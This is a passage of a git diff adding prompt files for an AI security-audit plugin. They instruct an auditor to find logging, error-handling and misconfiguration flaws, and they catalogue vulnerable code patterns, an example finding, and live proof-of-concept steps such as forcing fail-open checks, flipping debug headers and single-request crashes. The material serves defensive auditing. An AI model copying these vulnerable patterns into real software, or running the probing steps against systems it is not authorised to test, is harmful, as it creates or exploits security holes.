+unit test that drives the sink with the payload (`method:"unit-test"`).
diff --git a/plugins/security/prompts/finders/logging-errors.md b/plugins/security/prompts/finders/logging-errors.md
new file mode 100644
index 0000000..e3851b9
--- /dev/null
+++ b/plugins/security/prompts/finders/logging-errors.md
@@ -0,0 +1,355 @@
+<!--
+FINDER PROMPT — logging-errors. You are a fresh-context auditor hunting ONE
+class: Logging, Error & Exception Handling. Read the target's code; emit finding
+objects. Signal discipline (AGENTS.md) is binding. This class has TWO finding
+shapes, both needing a concrete sink: (A) DISCLOSURE — a tainted/sensitive value
+reaches a SINK that an attacker or unauthorized party reads (an HTTP error
+response shown to the client, a log/telemetry stream a lower-trust party can
+read); (B) MISSING/FAIL-OPEN HANDLING — a catch/rescue or an unhandled
+exceptional condition that swallows or fails OPEN on a security decision, or an
+absent audit record for a security-significant event whose absence is itself the
+weakness. No "add more logging" musings without a security event, no flagging
+ordinary debug logs that carry no secret/PII, no dead code, no posture items
+(no log-retention/SIEM-integration process gaps).
+-->
+
+# Finder — Logging, Error & Exception Handling (`logging-errors`)
+
+**Class key:** `logging-errors` · **OWASP:** A09:2025 (Security Logging &
+Alerting Failures) / A10:2025 (Mishandling of Exceptional Conditions) ·
+**CWE:** CWE-532 (sensitive info in log) / CWE-209 (sensitive info in error
+message/response) / CWE-755 (improper handling of exceptional conditions) /
+CWE-703 (improper check/handling of exceptional conditions) / CWE-396 (catch of
+overly-broad exception) · **ASVS:** V16 (Security Logging & Error Handling)
+
+## 1. Objective
+
+Find places where (A) a secret, credential, token, or PII reaches a log/telemetry
+sink or a client-facing error response a lower-trust party can read; or (B) a
+security-relevant exceptional condition is mishandled — swallowed, caught too
+broadly, or failed OPEN so a security check is skipped — or a security-
+significant event has no audit record. The bug is information crossing a trust
+boundary via logs/errors, or a control silently not running because an exception
+took a permissive path.
+
+## 2. Where to look
+
+Three surfaces: the **logging layer**, the **error/exception path**, and the
+**security-event audit trail**.
+
+- **Logging layer:** central logger config & formatters, request/response
+  middleware that logs bodies/headers, structured-log field builders, "log the
+  whole object" calls (`log.info(user)`, `log.debug(req)`, `inspect`/`to_json`
+  of a model/params), audit helpers, HTTP client wrappers that log full
+  requests (with `Authorization`/`Cookie`), DB query loggers echoing bound
+  params, exception reporters/Sentry/Bugsnag breadcrumbs, webhook/payment
+  callback handlers logging raw payloads, third-party SDK debug modes.
+- **Error/exception path:** global error handlers / exception middleware,
+  `rescue`/`catch`/`except`/`recover`/`?`-unwrap sites, framework debug pages
+  (Rails `show_exceptions`, Flask `DEBUG=True`, Django `DEBUG=True`, Symfony
+  `APP_DEBUG`, Express default error handler, Spring whitelabel/
+  `server.error.include-stacktrace`), 500-handlers that render `e.message`/`e.backtrace`/
+  `str(e)` to the client, `try/except: pass`, `catch (e) {}`, `rescue => e;
+  nil`, `if err != nil { /* ignored */ }`, `.unwrap()`/`panic` on attacker
+  input.
+- **Security-event audit trail (absence is the bug):** authn (login success/
+  fail, logout), authz denials, password/MFA/email changes, privilege grants,
+  token issuance/revocation, admin actions, payment/refund, data export, account
+  lockout, key rotation — code paths that make these decisions but write NO audit
+  record (and there is a logging facility in the project, so it's an omission,
+  not "no logging exists"). Only flag where the missing record defeats detection
+  of a real attack the codebase is otherwise exposed to.
+
+Route/handler signals to grep: error middleware names (`errorHandler`,
+`ExceptionFilter`, `rescue_from`, `@app.errorhandler`, `Recover`), logger calls
+near auth/payment/token code, `DEBUG`/`development`/`verbose` flags reachable in
+prod config, and security decision points (`authorize`, `verify`, `authenticate`,
+`require_role`, signature/HMAC checks) wrapped in broad try/catch.
+
+Per-language SINK & pattern signals:
+
+- **Crystal:** `Log.info { user.inspect }`, `Log.error(exception: ex) { ... }`
+  logging full params; rendering `ex.message`/`ex.inspect_with_backtrace` to the
+  response; `rescue ex; nil` / bare `rescue` swallowing; Kemal/Lucky error
+  handler echoing `ex.message`; `Log.debug { request.headers.to_s }` (carries
+  `Authorization`).
+- **Ruby:** `Rails.logger.info(params.inspect)` / `logger.debug(user.attributes)`,
+  `logger.info "token=#{token}"`, full `request.headers`/`request.body.read`
+  logged; `rescue => e; render plain: e.message` / `e.backtrace`; `rescue
+  StandardError; nil` / `rescue Exception` swallow;
+  `config.consider_all_requests_local = true` in prod; `config.filter_parameters`
+  NOT covering a sensitive field; Sidekiq/ActiveJob logging args containing secrets.
+- **Node/TS:** `console.log(req.body)` / `logger.info({ headers: req.headers })`
+  / `logger.debug(user)`, `pino`/`winston` without redaction of `password`/
+  `authorization`; `res.status(500).send(err.stack)` / `res.json({ error: err
+  .message })`; Express default error handler in prod (`NODE_ENV` not
+  `production` → stack to client); `catch (e) {}` empty, `.catch(() => {})`
+  swallow, `try {...} catch { return true }` fail-open on an auth check.
+- **Python:** `logging.info("user=%s", user.__dict__)` / `logger.debug(request
+  .headers)` / `print(token)`, logging `request.POST`/`request.json`;
+  `return str(e)` / `traceback.format_exc()` in an HTTP response, Flask/Django
+  `DEBUG=True` reachable in prod; `except Exception: pass`, `except:
+  return True` fail-open, bare `except:` around a `check_permission`.
+- **Go:** `log.Printf("req: %+v", r)` / `log.Println(token)`, logging
+  `r.Header` (Authorization/Cookie); `http.Error(w, err.Error(), 500)` leaking
+  internal errors / `fmt.Fprintf(w, "%v", err)`; `if err != nil { return true }`
+  / `_ = doAuthCheck()` ignored error fail-open; `recover()` that resumes a
+  request after a security panic; verbose `gin`/`echo` error rendering in
+  release mode.
+- **PHP:** `error_log(print_r($_POST, true))` / `Log::info($request->all())`,
+  logging `$request->headers`; `display_errors=On` in prod,
+  `echo $e->getMessage()` / `var_dump($e)` to output, Laravel `APP_DEBUG=true`
+  (Ignition page leaks env + stack); `try {...} catch (\Exception $e) {}` empty,
+  `@`-suppressed calls hiding failures on a security op.
+- **Java:** `log.info("user={}", user)` / `log.debug(request.getHeader(
+  "Authorization"))`, logging full request/`Map` of params; `e.printStackTrace()` to a
+  response, `@ExceptionHandler` returning `e.getMessage()`/stack, Spring
+  `server.error.include-stacktrace=always` / `include-message=always`, whitelabel
+  in prod; `catch (Exception e) {}` empty, `catch (SecurityException e) { return
+  true; }` fail-open, swallowing `InterruptedException`/auth exceptions.
+- **Rust:** `tracing::info!(?req)` / `debug!("token = {}", token)` logging a
+  struct with secrets via `Debug`; returning `format!("{:?}", e)` /
+  `e.to_string()` in an HTTP body; `actix`/`axum` default error response leaking
+  internals; `let _ = verify(...);` ignoring a `Result`, `.unwrap_or(true)` /
+  `if check().is_err() { return Ok(authorized) }` fail-open, `.unwrap()`/`panic!`
+  on attacker-controlled input as an availability/exceptional-condition issue.
+
+## 3. Detection heuristics
+
+This class has two flow shapes (A, B) plus a missing-audit variant (B'). Frame
+every finding around a concrete SINK and a real reader/consequence.
+
+**Shape A — disclosure (CWE-532 / CWE-209).**
+- **SOURCES (sensitive value):** credentials/tokens/secrets — `password`,
+  `passwd`, `secret`, `token`, `authorization`/`Bearer`, session id, API key,
+  `set-cookie`/`cookie`, JWT, private key, OTP/MFA code, reset token, signing
+  key, card PAN/CVV; **and PII** — SSN/national id, full name+DOB, email at scale,
+  phone, address, health/financial records. Also: an *internal detail* that aids
+  attack — SQL text + bound values, file paths, stack traces, internal hostnames/
+  IPs, library versions, raw exception of a downstream system.
+- **SINKS (where it lands + who reads it):**
+  (1) a **log/telemetry stream** a lower-trust party can read — app logs shipped
+  to a broadly-readable store, container stdout, a third-party log/APM/error-
+  reporter, browser `console` in client code, a log file in the web root; or
+  (2) a **client-facing error/response** — an HTTP error body/header rendered to
+  the requester containing `e.message`/`e.backtrace`/stack/SQL/env. Name the
+  concrete reader: "shown in the 500 response to any client", "written to a log
+  forwarded to $third_party", "echoed to browser console of every visitor".
+- Vulnerable patterns: logging a whole request/headers/params/model
+  (`inspect`/`%+v`/`__dict__`/`to_json`/`{...req}`) that *contains* a source;
+  string-building a log line with a token/password var; an error handler that
+  serializes the exception (message/stack/cause-chain) into the client response;
+  debug/verbose mode reachable in prod that turns every 500 into a stack-trace
+  page; SQL/driver errors surfaced verbatim (overlaps `injection` recon — note,
+  don't double-report the injection itself here).
+
+**Shape B — mishandled exceptional condition (CWE-755 / CWE-703 / CWE-396).**
+- **SOURCE:** an operation on a security-relevant path that can throw/error —
+  an authn/authz check, signature/HMAC/JWT verification, decryption, a license/
+  quota/limit check, a payment/fraud check, input parsing of attacker data.
+- **SINK (the mishandling):** a `catch`/`rescue`/`except`/`if err != nil`/
+  `Result` site that (i) **fails OPEN** — on error returns `true`/authorized/the
+  default-allow, skips the check, or proceeds as if it passed; (ii) **swallows
+  silently** a security-significant failure so it neither blocks nor is recorded
+  (`except: pass`, empty `catch`, `rescue; nil`, ignored error return); (iii)
+  **catches too broadly** (`catch (Exception)`/`rescue Exception`/bare `except`)
+  around a security op so a control-flow exception meant to deny is absorbed into
+  the allow path; or (iv) is an **unhandled exceptional condition** on attacker
+  input that an attacker triggers for impact (panic/`.unwrap()` → crash/DoS, or a
+  thrown error that bypasses cleanup/leaves an inconsistent privileged state).
+- Vulnerable patterns to confirm: `try { return verify(t) } catch { return true }`;
+  `rescue => e; user.admin = true` style permissive fallback; signature check
+  whose exception path continues to the protected action; `_ = authorize(...)`
+  return value discarded; `recover()` that swallows then continues serving the
+  request as authenticated; a deny decision that throws and is caught by a
+  generic handler that returns 200.
+
+**Shape B' — missing audit (CWE-778, under A09).** A security-significant event
+(login success/fail, lockout, authz denial, privilege change, password/MFA reset,
+token issue/revoke, admin/data-export/payment action) executes with **no audit
+record**, in a codebase that *does* log elsewhere (so the gap is real, not "no
+logging at all"). Only flag where the absence concretely defeats detection of an
+attack the app is exposed to (e.g. credential stuffing with no failed-login log,
+admin takeover with no actor trail). This is the one shape allowed without a
+"dangerous sink" — the sink is the absent record on an attack-relevant path.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds and is effective on the path:
+
+- **Redaction / filtering applied on the path (Shape A):** the framework's
+  parameter/field filter covers the sensitive key and runs before the sink —
+  Rails `config.filter_parameters` including the field, `pino` `redact:
+  ['req.headers.authorization','*.password']`, `winston` redact format, Python
+  `logging.Filter`/structlog processor that masks, Go zap/zerolog hooks that
+  drop sensitive fields, a `to_log`/`as_json(except:)`/`__repr__` that omits
+  secrets, an explicit `mask()/redact()/[FILTERED]` on the value. Confirm the
+  filter actually covers *this* field/path — a filter list that misses the exact
+  key is NOT effective (name the gap).
+- **Value is not actually sensitive:** a user id (not a token), a public slug,
+  a non-secret config value, a request path/method/status (ordinary access log),
+  a duration/count metric, a correlation id. Logging these is normal — only flag
+  when a real secret/PII/internal-leak source is in the payload.
+- **Sink is not lower-trust-readable (Shape A):** the log goes only to a store no
+  lower-trust party can read AND is not forwarded to a third party, and the value
+  never reaches a client response. Likewise, if the audit cannot identify any
+  lower-trust reader of the sink, it's defense-in-depth, not a finding.
+  (Container stdout, broadly-shared log platforms, and third-party error
+  reporters DO count as readable — don't dismiss those.)
+- **Generic / safe error response (Shape A):** the client gets a generic message
+  plus an opaque correlation/incident id, while the detail is logged server-side
+  only. Custom error pages, `production` mode with stack traces suppressed
+  (`NODE_ENV=production`, `DEBUG=False`, `APP_DEBUG=false`, `include-stacktrace=never`)
+  — verify the prod config actually disables verbose output; a debug flag
+  defaulting on, or driven by an attacker-settable header/param, is NOT safe.
+- **Fail-CLOSED handling (Shape B):** the catch/rescue/error branch DENIES —
+  returns 401/403/false, re-raises, aborts the request, logs and blocks. Catching
+  a *specific* expected exception (e.g. `RecordNotFound -> 404`) and handling it
+  correctly is fine. A broad catch is fine if its body denies/re-raises (it
+  doesn't fail open). Only a permissive/swallowing/ignored path is a finding.
+- **Exception can't reach a security decision / attacker can't trigger it
+  (Shape B):** the `.unwrap()`/`catch` is on a path attacker input never reaches,
+  or the swallowed error is on a non-security operation with no skipped control
+  and no inconsistent privileged state. No reachable trigger or no security
+  consequence → not a finding.
+- **Audit record exists elsewhere on the path (Shape B'):** the event IS logged
+  by a wrapper/middleware/decorator/aspect/DB trigger you missed — trace the full
+  path before claiming absence. A "missing logging" claim with no concrete
+  attack it would have caught is defense-in-depth, not a finding.
+
+If a guard exists but is bypassable — a redaction list missing the exact key, a
+filter applied to one logger but the secret logged via another, prod-mode
+detection keyed off an attacker-controlled header, a "fail-closed" branch that
+only runs for one of several exception types while a sibling type falls through
+to allow — it is NOT a mitigation. Flag it and name the exact bypass in
+`sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — a live credential/session/signing-secret or bulk PII written to
+  a sink a remote/lower-trust attacker reads (token in a client-readable log,
+  password in an error returned to the client), enabling account/data takeover;
+  OR a fail-open exception handler on a primary authn/authz/signature check that
+  an unauthenticated attacker triggers to bypass the control entirely.
+- **High** — sensitive value (single user's token/PII, full stack trace + SQL +
+  internal paths) disclosed in a client-facing error or a broadly-readable log
+  enabling targeted follow-on; OR a fail-open/swallowed exception on a security
+  check behind an authn wall; OR `panic`/`.unwrap()` on unauthenticated attacker
+  input giving reliable remote DoS of a critical service.
+- **Medium** — internal info leak with limited attack value (versions, generic
+  internal error text, partial stack) in an error response; a debug/verbose flag
+  that is on but only behind auth or hard to reach; PII to a log of moderate
+  reach; a swallowed exception that degrades a non-primary control; missing audit
+  on a security event where partial signal exists elsewhere.
+- **Low/Info** — minor over-logging with weak sensitivity, theoretical fail-open
+  on an unreachable path, or a missing-audit gap with no concrete attack it would
+  catch — usually downgrade or drop per §4.
+
+For Shape B', severity tracks the *attack the missing record blinds you to*
+(e.g. no failed-login log on a credential-stuffing-exposed endpoint = High), not
+the act of not-logging itself.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "logging-errors-001",
+  "title": "Production error handler returns exception message + stack trace to client",
+  "vuln_class": "logging-errors",
+  "owasp": "A10:2025",
+  "cwe": "CWE-209",
+  "asvs": "V16",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/middleware/error.ts",
+  "line": 14,
+  "end_line": 17,
+  "code_excerpt": "app.use((err, req, res, next) => {\n  res.status(500).json({ error: err.message, stack: err.stack });\n});",
+  "source": "server-side exception object (err.message/err.stack) — for DB errors it embeds the SQL, table/column names, file paths, and library versions",
+  "sink": "HTTP 500 JSON body returned to the requesting client — readable by any unauthenticated caller who triggers an error",
+  "data_flow": "any thrown error -> Express error middleware -> res.json({error: err.message, stack: err.stack}); the full message and stack cross the trust boundary into the response with no generic-message substitution",
+  "sanitizers_checked": "no NODE_ENV gate (stack returned regardless of env); no generic-message + correlation-id pattern; no allowlist of safe error types; verbose path is the default, not opt-in; not suppressed in production config",
+  "rationale": "Reachable by any client that can induce a 500 (malformed input, type errors). Stack + message reveal source paths, dependency versions, and DB schema/SQL, mapping the internals for follow-on attacks. Same leak in src/middleware/api-error.ts:22.",
+  "exploit_sketch": "Send a request that throws (e.g. a body that fails a DB constraint or a type coercion). Read the 500 JSON: harvest the SQL/schema, absolute file paths, and package versions to pivot to injection/known-CVE exploitation.",
+  "dynamic_poc_plan": "Against the running app, POST a malformed payload to an endpoint that hits the DB; observe the 500 response body contains err.stack with file paths and the failing SQL — proving internal detail leaks to the client. A generic message would show none of this.",
+  "proposed_fix": "The error handler must stop returning the raw exception message/stack across the trust boundary and instead surface only a generic, opaque response while the detail stays server-side — so internal details no longer leak to untrusted callers. Direction only; the exact response shape and the prod-mode gating are for the engineer to design."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. For Shape A, `source` is the specific sensitive value (name
+the field — `Authorization` header, `password` param, the token var) and `sink`
+names *where it lands and who reads it* (the exact log stream/third party, or
+"the 500 response to any client"); `data_flow` traces the value into the
+log/response call and notes no redaction/generic-message sits between. For Shape
+B, `source` is the security operation that throws, `sink` is the catch/ignore
+site, and `data_flow` states *why the error path is permissive* (returns
+true/skips the check/swallows) and what control is thereby skipped; for B'
+(missing audit), `sink` is "no audit record on <event>" and `data_flow` names the
+attack whose detection is defeated. `sanitizers_checked` is the §4 FP guard made
+explicit — list each relevant control (redaction filter, prod-mode gate, generic-
+message pattern, fail-closed branch, existing audit elsewhere) and state it is
+absent or, if present, name the exact bypass. Pick `cwe` by shape: 532 sensitive
+data in a **log**, 209 sensitive data in an **error message/response**, 755/703
+mishandled/unchecked exceptional condition (fail-open/swallow/unhandled), 396
+overly-broad catch, 778 missing audit (A09). Use `status:"likely"` for a proven
+static trace, `"confirmed"` only after dynamic repro, `"triage"` when the
+reader/reachability or the security consequence is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove a sensitive value actually crosses the boundary, or that the error
+path actually fails open / a security event leaves no trace. Pick the oracle by
+shape:
+
+1. **Error-response disclosure (Shape A, CWE-209).** Induce an error on the live
+   endpoint — malformed body, type mismatch, oversized/empty input, a value that
+   trips a DB constraint. **Observed proof** = the HTTP response (body or headers)
+   contains an exception message, stack trace, SQL text, internal file path,
+   internal hostname/IP, or dependency version that a generic handler would never
+   emit. Capture the exact response. If a debug flag is suspected attacker-
+   settable, send it (`?debug=1`, `X-Debug: true`, `Accept` variations) and show
+   it flips on verbose output.
+2. **Log disclosure (Shape A, CWE-532).** Drive the endpoint with a uniquely
+   marked credential/token (a nonce value in the `Authorization`/`password`/
+   token field), then inspect the log sink the harness can read (container
+   stdout, the configured log file, the test APM/collector). **Observed proof** =
+   the nonce secret appears verbatim (or unredacted) in the log stream — proving
+   the secret is logged. If the real sink isn't reachable, assert the same via a
+   unit test that captures the logger output and shows the field present.
+3. **Fail-open exception (Shape B, CWE-755/703/396).** Force the security
+   operation to throw while sending a request that should be DENIED — feed input
+   that makes the verify/decrypt/authz call raise (malformed token/signature,
+   downstream dependency made to error, a value that triggers the broad catch).
+   **Observed proof** = the request is nonetheless ALLOWED (200 + protected
+   resource / authenticated session / privileged action performed) when a
+   correct fail-closed handler would return 401/403 — demonstrating the
+   exception routed into the allow path. Contrast with a well-formed denied
+   request to show the difference is the thrown-and-swallowed error.
+4. **Unhandled condition / DoS (Shape B, CWE-755).** Send the attacker-controlled
+   input that reaches the `panic`/`.unwrap()`/uncaught throw. **Observed proof** =
+   the worker/process crashes or the request hangs/aborts, and (if applicable)
+   the service stops serving — a reliable single-request DoS. Note whether it's
+   process-wide or request-scoped in `impact`.
+5. **Missing audit (Shape B').** Perform the security-significant action on the
+   live app (e.g. N failed logins, an authz-denied access, a privilege change),
+   then inspect every audit/log sink. **Observed proof** = the action completed
+   but NO record of it exists in any audit stream the defender would consult —
+   proving the event is unobservable. Pair with the concrete attack (credential
+   stuffing / silent privilege escalation) it would have surfaced.
+
+Run the relevant bypass checks when a partial guard exists: a redaction list that
+misses the exact key (send the nonce in the un-redacted field), a prod-mode gate
+driven by a request header (set it), a fail-closed branch that only covers one
+exception type (trigger a sibling type). Record the exact request and observed
+evidence in the `Repro` object (`reproduced`, `method:"live-exploit"`, `poc`,
+`observed`, `impact`). A response carrying the stack/secret, the app accepting a
+denied request after a forced exception, a crash from one request, or a completed
+action with no audit trace each prove the class — set `method:"live-exploit"`.
+If the app can't be run, fall back to a focused unit test that drives the
+sink/handler with the payload and captures the leaked output or the fail-open
+return (`method:"unit-test"`).
diff --git a/plugins/security/prompts/finders/misconfig.md b/plugins/security/prompts/finders/misconfig.md
new file mode 100644
index 0000000..ad0ca25
--- /dev/null
+++ b/plugins/security/prompts/finders/misconfig.md
@@ -0,0 +1,312 @@
+<!--
+FINDER PROMPT — misconfig. You are a fresh-context auditor hunting ONE class:
+Security Misconfiguration. Read the target's code & config; emit finding objects.
+Signal discipline (AGENTS.md) is binding: only a setting that creates a
+REACHABLE exposure of an untrusted-facing surface (or a parser that processes
+attacker input through a dangerous-by-config sink) with no effective guard is a
+finding. No generic hardening checklists, no posture/process items, no dead code.
+-->
+
+# Finder — Security Misconfiguration (misconfig)
+
+**Class key:** `misconfig` · **OWASP:** A02:2025 · **CWE:** CWE-16, CWE-614, CWE-942, CWE-1004, CWE-611 · **ASVS:** V13
+
+## 1. Objective
+
+Find configuration choices that expose the running app to untrusted callers:
+debug/dev mode in production, permissive CORS, missing/insecure security headers
+and cookie flags, exposed admin/actuator/metrics/management endpoints, default
+or shipped credentials, verbose error/stack-trace pages, XXE-enabled XML parsers,
+and world-readable cloud storage. The bug is the *setting*, reachable over the
+network or applied to attacker-controlled input — not a code-flow injection.
+
+## 2. Where to look
+
+Configuration lives in code, framework config files, env defaults, and IaC.
+
+- **Framework/app config:** `config/environments/*.rb`, `settings.py`/
+  `settings/*.py`, `application.{properties,yml}`, `appsettings*.json`, `.env`/
+  `.env.example`, `next.config.js`, `nuxt.config`, `vite.config`, `config.exs`,
+  `wp-config.php`, Crystal `Kemal.config`/`Lucky` env blocks, Go `init()`/flag
+  defaults, Rust `Config`/`figment` builders.
+- **Server/proxy config:** `nginx.conf`, `httpd.conf`/`.htaccess`, `Caddyfile`,
+  `web.config`, `traefik` labels, Express/Koa middleware setup, FastAPI/Starlette
+  middleware, Spring `WebSecurityConfigurerAdapter`/`SecurityFilterChain`.
+- **CORS:** any `Access-Control-Allow-Origin`/`-Credentials` emission; middleware
+  like `cors()` (Express), `flask-cors` `CORS(app)`, `django-cors-headers`,
+  `rack-cors`, Spring `@CrossOrigin`/`CorsConfiguration`, Go `rs/cors`,
+  `gin-contrib/cors`, Crystal `Kemal::Middleware` custom CORS, FastAPI
+  `CORSMiddleware`.
+- **Management/admin surfaces:** Spring Boot Actuator (`management.endpoints.*`,
+  `/actuator/**`), Django Admin (`/admin/`) + `DEBUG`, Flask Debug/Werkzeug
+  console, Rails `/rails/info`, web-console gem, Sidekiq/Resque/Bull dashboards,
+  GraphQL playground/introspection, Swagger/OpenAPI UI, Prometheus `/metrics`,
+  Node `--inspect`, Elasticsearch/Mongo/Redis bound to `0.0.0.0`, pprof
+  (`net/http/pprof` auto-registering on `DefaultServeMux`), Rails Action Cable /
+  `/up` health with internals.
+- **Error handling / debug:** `DEBUG`/`development` flags, `display_errors`,
+  `show_exceptions`, `consider_all_requests_local`, `app.debug`, custom 500
+  pages that render stack traces, ASP.NET `customErrors mode="Off"`.
+- **XML parsers (XXE):** any XML/SOAP/SAML/SVG/DOCX/XLSX/RSS/XML-RPC ingestion of
+  request bodies, uploads, or webhook payloads.
+- **Cloud/IaC:** Terraform/CloudFormation/Pulumi/CDK, k8s manifests, Helm values,
+  `Dockerfile`/`docker-compose.yml`; S3/GCS/Azure bucket ACLs & policies,
+  security groups, public IPs, privileged containers.
+
+Grep signals: `debug`, `DEBUG`, `development`, `allow_origin`, `Allow-Origin`,
+`credentials: true`, `SameSite`, `secure`, `httpOnly`, `actuator`, `metrics`,
+`/admin`, `introspection`, `playground`, `display_errors`, `customErrors`,
+`XMLInputFactory`, `DocumentBuilderFactory`, `setExternalGeneralEntities`,
+`resolve_entities`, `noent`, `0.0.0.0`, `public-read`, `AllUsers`, `*`.
+
+## 3. Detection heuristics
+
+This class has two shapes. (A) **Setting-exposes-surface:** the "source" is the
+untrusted network reaching an endpoint/response governed by the setting; the
+"sink" is the misconfigured directive itself. (B) **Parser/XXE:** classic
+SOURCE (attacker XML) → SINK (entity-resolving parse).
+
+**Taint SOURCES** (untrusted): any unauthenticated/cross-origin HTTP request that
+reaches the exposed surface; the cross-origin page's `Origin` header (CORS);
+attacker-supplied XML/SVG/document bytes for XXE; an internet-routable bucket URL
+for cloud exposure.
+
+**Taint SINKS** (dangerous setting/op): the directive that grants exposure — a
+reflected `Access-Control-Allow-Origin` with credentials, `DEBUG=True`, an
+unauthed actuator route, an entity-resolving parser, a `public-read` ACL.
+
+Vulnerable patterns to confirm:
+
+- **Debug/dev mode reachable in prod:**
+  - Python/Django `DEBUG = True` (Werkzeug/Django traceback page → SECRET_KEY,
+    env, source); Flask `app.run(debug=True)` or `app.debug=True` (interactive
+    `/console` PIN-protected but PIN derivable → RCE).
+  - Rails `config.consider_all_requests_local = true` or
+    `config.web_console.whitelisted_ips` permissive in a prod env file.
+  - Node `NODE_ENV !== 'production'` gating stack traces, Express default error
+    handler leaking `err.stack`; `app.set('env','development')`.
+  - PHP `display_errors = On` / `ini_set('display_errors',1)`;
+    `error_reporting(E_ALL)` with output.
+  - Symfony `APP_ENV=dev` web profiler/`_profiler` exposed; ASP.NET
+    `<customErrors mode="Off">` / `app.UseDeveloperExceptionPage()` unconditional.
+  - Go: handlers that echo raw errors to the client — `fmt.Fprintf(w, "%+v", err)`.
+- **Permissive CORS:**
+  - Reflecting Origin **and** allowing credentials:
+    `Access-Control-Allow-Origin: <reflected Origin>` + `Allow-Credentials:
+    true` (defeats same-origin; any site reads authed responses). Express:
+    `cors({origin: true, credentials: true})` or `origin: (o,cb)=>cb(null,true)`.
+    Flask: `CORS(app, supports_credentials=True)` with default `*`/reflect.
+    Spring: `config.setAllowedOrigins(List.of("*"))` +
+    `setAllowCredentials(true)` (or `@CrossOrigin(origins="*",
+    allowCredentials="true")`). Go `rs/cors`: `AllowedOrigins:["*"],
+    AllowCredentials:true`. (Confirm `*` is echoed back as the Origin; a literal `*` is inert, §4.)
+  - `ACAO: *` on an endpoint serving sensitive data (even without credentials).
+  - Naive origin allowlist by substring/suffix: `origin.endsWith("trusted.com")`
+    (→ `trusted.com.evil.com`) or `origin.includes(...)`.
+  - `null` origin allowed (reachable via sandboxed iframe / data: URI).
+- **Missing/insecure security headers & cookie flags:** session/auth cookies set
+  without `Secure` + `HttpOnly` + `SameSite` (CWE-614/1004/1275): Express
+  `res.cookie('sid', v)` (no opts), Rails `session_store` without `secure:true`,
+  Django `SESSION_COOKIE_SECURE=False`/`SESSION_COOKIE_HTTPONLY=False`, PHP
+  `session.cookie_secure=0`. Missing `Strict-Transport-Security`,
+  `X-Frame-Options`/`frame-ancestors` on auth/state-changing pages. (Only flag
+  with a concrete impact path — see §4/§5.)
+- **Exposed management/admin/metrics:** Spring Boot
+  `management.endpoints.web.exposure.include=*` with security disabled →
+  `/actuator/env`, `/heapdump`, `/jolokia` (RCE), `/shutdown`. Go
+  `import _ "net/http/pprof"` on a public `DefaultServeMux`. GraphQL
+  `introspection: true` + playground in prod. Swagger UI mounted unauthenticated
+  on a private API. Datastore bound `0.0.0.0` with no auth in compose/k8s.
+  Sidekiq/Bull/Flower dashboards mounted without an auth constraint.
+- **Default / shipped credentials:** admin bootstrap with a literal default
+  (`admin`/`admin`, `password`, `changeme`), env defaults like
+  `POSTGRES_PASSWORD=postgres`, `JWT_SECRET=secret`/`devsecret` used when env
+  unset, demo API keys, framework sample secrets (`SECRET_KEY_BASE` checked-in,
+  Django `SECRET_KEY='django-insecure-...'`). Pattern: `ENV["X"] || "literal"`
+  where the literal is a credential and prod can hit the fallback. (Hardcoded
+  *secrets* discovery is the `secrets` finder; here flag the **default-credential
+  configuration / weak fallback** that grants access.)
+- **Verbose error pages:** custom exception handler that serializes
+  `exception.message`/`stack`/SQL into the HTTP response for any caller.
+- **XXE-enabled parsers** (SOURCE→SINK, the one true taint flow here):
+  - Java: `DocumentBuilderFactory.newInstance()` / `SAXParserFactory` /
+    `XMLInputFactory` / `TransformerFactory` / `SAXReader` / `Unmarshaller`
+    **without** `disallow-doctype-decl` / `external-general-entities=false`.
+    `dbf.parse(request.getInputStream())`.
+  - Python: `lxml.etree.parse(data, etree.XMLParser(resolve_entities=True))` or
+    default `resolve_entities` in old lxml; `xml.dom.minidom`/`xml.sax`/
+    `pulldom`/`xmlrpc` without `defusedxml` (stdlib resolves external entities only pre-3.7.1 — verify).
+  - PHP: `libxml_disable_entity_loader(false)` + `DOMDocument->loadXML($body)` /
+    `simplexml_load_string` / `XMLReader` with `LIBXML_NOENT`.
+  - .NET: `XmlReaderSettings.DtdProcessing = DtdProcessing.Parse` +
+    `XmlResolver` set; legacy `XmlDocument.LoadXml(userXml)` (DTD on by default
+    pre-4.5.2).
+  - Ruby: `Nokogiri::XML(body){|c| c.noent}` (the `NOENT` option enables entity
+    substitution); `REXML` (entity-expansion/billion-laughs).
+  - Node: `libxmljs.parseXml(body, {noent:true})`; some `xml2js`/`fast-xml-parser`
+    configs. (Many JS XML parsers don't resolve external entities by default —
+    verify.)
+  - Go/Crystal/Rust: stdlib `encoding/xml`, Crystal `XML.parse`, Rust
+    `quick-xml`/`roxmltree` generally do NOT resolve external entities — usually
+    NOT XXE; confirm before flagging.
+- **World-readable cloud storage / IaC exposure:**
+  - Terraform `aws_s3_bucket_acl { acl = "public-read" }` /
+    `aws_s3_bucket_public_access_block` with all `false` / bucket policy
+    `Principal:"*"` + `s3:GetObject`; GCS `iam_member` granting `allUsers`
+    `objectViewer`; Azure container `container_access_type = "blob"/"container"`.
+  - Security group `cidr_blocks = ["0.0.0.0/0"]` to 22/3306/6379/admin ports.
+  - k8s/compose: `privileged: true`, `hostNetwork`, ports published to host,
+    `runAsUser: 0`/no `runAsNonRoot`, secrets mounted readable.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds:
+
+- **Setting is environment-gated to non-prod and prod cannot reach it.** `DEBUG`,
+  dev error pages, playground/introspection, profilers behind a real
+  environment check (`if Rails.env.development?`, `if (process.env.NODE_ENV !==
+  'production')`, Django `DEBUG = env.bool("DEBUG", False)` defaulting False,
+  Spring profile `@Profile("dev")`). Verify the **default/prod** value, not the
+  dev one. A `DEBUG=True` only in `settings/dev.py` that prod never imports is
+  not a finding.
+- **CORS is safe:** exact-origin allowlist (parsed, full-origin equality), or
+  `*` **without** `Allow-Credentials` on **non-sensitive/public** data, or
+  credentials disabled. Note: browsers reject `ACAO:*` + credentials, so that
+  exact combo is inert — only **reflected/dynamic** origin + credentials is the
+  real bug. A reflected origin checked against a strict allowlist is fine.
+- **Management/admin surface is authenticated/network-isolated in code or
